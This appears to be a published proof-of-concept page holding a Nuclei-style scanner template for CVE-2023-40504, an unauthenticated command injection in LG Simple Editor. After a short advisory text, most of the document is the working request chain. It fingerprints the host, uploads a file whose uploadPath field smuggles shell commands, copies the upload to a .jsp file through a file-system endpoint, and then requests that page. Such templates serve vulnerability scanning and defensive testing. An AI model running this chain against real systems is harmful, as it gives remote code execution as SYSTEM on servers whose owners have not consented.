LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
PoC代码[已公开]
id: CVE-2023-40504
info:
name: LG Simple Editor <= v3.21.0 - Command Injection
author: s4e-io
severity: critical
description: |
LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
reference:
- https://www.zerodayinitiative.com/advisories/ZDI-23-1208/
- https://packetstormsecurity.com/files/180171/LG-Simple-Editor-3.21.0-Command-Injection.html
- https://0day.today/exploit/39719
- https://www.usom.gov.tr/bildirim/tr-24-0417
- https://nvd.nist.gov/vuln/detail/CVE-2023-40504
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-40504
cwe-id: CWE-78
epss-score: 0.89601
epss-percentile: 0.99536
metadata:
max-request: 1
verified: true
vendor: lg
product: simple_editor
fofa-query: icon_hash="159985907"
tags: cve,cve2023,lg,simple-editor,intrusive,rce,file-upload
variables:
filename: "{{rand_base(12)}}"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"LG Simple Editor")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadVideo"; filename="{{filename}}.bmp"
/
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadPath"
/"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../"
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadFile_x"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadFile_width"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadFile_height"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW--
matchers:
- type: dsl
dsl:
- 'contains_all(body, "errorCode","errorMessage","fail")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/json
{"command":"cp","option":"-f","srcPath":"/{{filename}}_original.bmp","destPath":"/{{filename}}.jsp"}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "errorCode","errorMessage","data","success")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /simpleeditor/{{filename}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502201ea3f64ae716bee766581a8660a3746346912ca3318d2b5899da28b70bf72f85022100e797dc82b879d2cb2662a6cd13e3e88857885c9473dbf9829d45270506317fdb:922c64590222798bb761d5b6d8e72950